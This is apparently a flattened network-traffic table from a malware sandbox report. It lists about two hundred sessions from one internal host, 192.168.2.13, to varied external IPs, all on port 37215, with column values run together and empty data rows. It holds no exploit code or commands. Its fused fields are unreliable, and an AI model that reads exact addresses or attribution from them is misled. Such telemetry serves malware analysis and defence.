                                                  19617192.168.2.1348068197.68.81.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19618192.168.2.1337868197.230.1.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19619192.168.2.1340048197.96.49.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19620192.168.2.1336412197.166.143.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19621192.168.2.1350490197.172.121.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19622192.168.2.133277641.33.250.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19623192.168.2.134489041.235.99.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19624192.168.2.134587841.153.195.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19625192.168.2.1339846197.32.127.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19626192.168.2.1333210204.156.172.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19627192.168.2.1354814197.65.253.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19628192.168.2.1353272197.195.80.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19629192.168.2.1349780198.4.212.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19630192.168.2.135174041.70.122.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19631192.168.2.134777441.30.61.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19632192.168.2.1335276157.163.68.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19633192.168.2.1360638157.7.129.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19634192.168.2.1335420197.33.101.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19635192.168.2.1337028197.227.232.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19636192.168.2.1340678197.218.122.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19637192.168.2.136085841.190.235.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19638192.168.2.1349002164.107.81.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19639192.168.2.134902283.139.251.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19640192.168.2.1334542197.109.113.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19641192.168.2.1347102168.140.172.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19642192.168.2.133384641.11.173.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19643192.168.2.1348840157.177.125.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19644192.168.2.1342684106.61.185.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19645192.168.2.1347256197.112.248.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19646192.168.2.135861641.57.209.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19647192.168.2.1339438197.50.182.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19648192.168.2.1357604155.168.6.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19649192.168.2.1339498157.14.38.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19650192.168.2.1348592197.178.205.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19651192.168.2.1336496157.147.105.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19652192.168.2.1340848157.5.173.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19653192.168.2.133512881.178.11.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19654192.168.2.1339016210.207.58.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19655192.168.2.133829041.83.226.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19656192.168.2.1354838191.40.93.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19657192.168.2.134123465.158.230.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19658192.168.2.1344768208.224.207.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19659192.168.2.133721041.205.146.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19660192.168.2.1359528197.77.110.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19661192.168.2.133503641.98.51.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19662192.168.2.1341506197.108.193.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19663192.168.2.135234841.147.100.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19664192.168.2.1342316157.205.63.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19665192.168.2.1336964160.231.252.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19666192.168.2.1342066157.232.241.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19667192.168.2.1356366157.185.91.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19668192.168.2.1338406157.161.180.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19669192.168.2.1356196157.21.143.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19670192.168.2.133422441.138.53.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19671192.168.2.1345650157.193.172.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19672192.168.2.1355416197.204.131.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19673192.168.2.1338948102.72.252.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19674192.168.2.134043441.227.219.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19675192.168.2.134584641.182.63.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19676192.168.2.1360940142.178.97.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19677192.168.2.1354498197.90.24.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19678192.168.2.1354590157.250.61.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19679192.168.2.1357232166.243.162.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19680192.168.2.1359128197.79.184.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19681192.168.2.1341662197.71.244.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19682192.168.2.1358710157.220.250.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19683192.168.2.1342642136.70.79.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19684192.168.2.1342842159.252.10.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19685192.168.2.1347268222.156.195.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19686192.168.2.1359750129.10.84.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19687192.168.2.1339982161.105.205.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19688192.168.2.134538841.108.112.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19689192.168.2.1343634197.35.166.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19690192.168.2.1350940157.153.15.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19691192.168.2.1346734157.185.5.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19692192.168.2.135551069.249.106.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19693192.168.2.136040441.146.204.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19694192.168.2.134841441.60.85.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19695192.168.2.1356176197.124.214.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19696192.168.2.1347760197.67.81.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19697192.168.2.1355874197.23.163.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19698192.168.2.1357464143.184.168.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19699192.168.2.1343438197.219.216.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19700192.168.2.1356542157.155.41.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19701192.168.2.133740841.241.183.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19702192.168.2.1351194200.48.20.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19703192.168.2.134429241.39.107.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19704192.168.2.1344644126.118.238.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19705192.168.2.1342436188.12.150.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19706192.168.2.1360730157.94.105.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19707192.168.2.1336264157.254.43.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19708192.168.2.1344632157.240.128.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19709192.168.2.1351294197.89.66.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19710192.168.2.1355604197.98.187.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19711192.168.2.1352804197.106.93.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19712192.168.2.1337674197.128.85.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19713192.168.2.1351428157.7.201.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19714192.168.2.135444841.28.169.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19715192.168.2.1341468157.178.138.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19716192.168.2.1337066197.164.247.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19717192.168.2.1357932157.217.103.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19718192.168.2.1345580223.120.121.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19719192.168.2.1344862157.180.214.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19720192.168.2.13505581.90.0.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19721192.168.2.1352514157.206.69.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19722192.168.2.134311641.54.225.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19723192.168.2.133588641.208.193.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19724192.168.2.134311241.206.73.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19725192.168.2.1354398139.63.205.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19726192.168.2.135827260.126.235.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19727192.168.2.1337036197.8.236.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19728192.168.2.1357328173.67.38.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19729192.168.2.134899641.129.93.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19730192.168.2.133434441.150.243.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19731192.168.2.134140241.244.42.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19732192.168.2.1360406111.241.211.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19733192.168.2.1341734157.198.201.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19734192.168.2.1358846157.247.56.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19735192.168.2.135609241.19.52.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19736192.168.2.1356200197.251.20.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19737192.168.2.135853232.107.19.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19738192.168.2.1360344197.120.3.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19739192.168.2.1342886157.108.27.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19740192.168.2.1334652157.245.172.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19741192.168.2.1332916171.240.64.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19742192.168.2.1354540107.20.244.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19743192.168.2.1342818157.220.143.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19744192.168.2.134598041.36.79.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19745192.168.2.1352854157.102.83.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19746192.168.2.1344948197.75.210.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19747192.168.2.134151441.9.96.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19748192.168.2.1347066197.122.21.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19749192.168.2.1342284197.16.120.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19750192.168.2.1358438157.212.217.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19751192.168.2.1360564197.13.217.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19752192.168.2.1340360157.206.148.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19753192.168.2.134691441.64.9.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19754192.168.2.134834241.230.225.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19755192.168.2.1358330197.54.179.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19756192.168.2.1347288197.150.147.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19757192.168.2.1356866197.178.2.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19758192.168.2.1337612197.10.6.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19759192.168.2.1360780157.106.14.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19760192.168.2.1338018197.122.170.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19761192.168.2.1351426157.47.32.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19762192.168.2.134598641.39.226.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19763192.168.2.1350370157.7.135.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19764192.168.2.1338716197.222.155.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19765192.168.2.13543722.30.237.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19766192.168.2.135552641.201.192.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19767192.168.2.1358508197.157.102.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19768192.168.2.133357441.33.12.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19769192.168.2.1342394199.159.252.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19770192.168.2.135854441.211.25.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19771192.168.2.1353236197.225.48.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19772192.168.2.13451621.38.74.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19773192.168.2.1359948197.38.169.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19774192.168.2.1354710184.56.168.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19775192.168.2.1354554197.83.203.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19776192.168.2.1342636157.149.82.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19777192.168.2.135487278.212.33.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19778192.168.2.1334708200.167.9.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19779192.168.2.134362641.62.250.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19780192.168.2.1349964197.104.65.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19781192.168.2.135539875.77.181.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19782192.168.2.1358754157.18.229.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19783192.168.2.135376241.45.239.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19784192.168.2.1348498204.124.7.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19785192.168.2.1354560157.25.225.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19786192.168.2.1337674177.206.52.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19787192.168.2.1350084157.166.193.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19788192.168.2.1353638170.41.255.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19789192.168.2.1338686157.59.11.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19790192.168.2.1357138157.110.52.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19791192.168.2.135342082.166.132.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19792192.168.2.134628441.80.133.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19793192.168.2.1356694197.155.129.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19794192.168.2.1347746183.230.3.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19795192.168.2.1348072197.130.27.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19796192.168.2.135584241.148.201.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19797192.168.2.1352626157.43.138.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19798192.168.2.1350986157.30.241.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19799192.168.2.1347302197.249.170.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19800192.168.2.1333944197.58.147.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19801192.168.2.1341056194.47.186.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19802192.168.2.1355804157.83.29.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19803192.168.2.134011841.163.73.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19804192.168.2.1348200197.248.237.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19805192.168.2.134027039.76.81.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19806192.168.2.1345818157.140.184.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19807192.168.2.1344730197.25.162.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19808192.168.2.134851641.162.247.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19809192.168.2.1346626104.176.21.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19810192.168.2.1340950157.203.50.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19811192.168.2.134786641.103.194.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19812192.168.2.1345098157.1.102.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19813192.168.2.1357840197.155.197.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19814192.168.2.1335686128.45.245.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19815192.168.2.1338354157.230.151.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19816192.168.2.1332858157.181.56.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19817192.168.2.136080641.91.153.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19818192.168.2.1342158157.255.190.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19819192.168.2.1336644197.82.27.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19820192.168.2.134174241.221.105.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19821192.168.2.1346580157.194.38.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19822192.168.2.1332972157.158.11.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19823192.168.2.1349056190.151.185.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19824192.168.2.133519841.0.43.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19825192.168.2.135106841.165.135.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
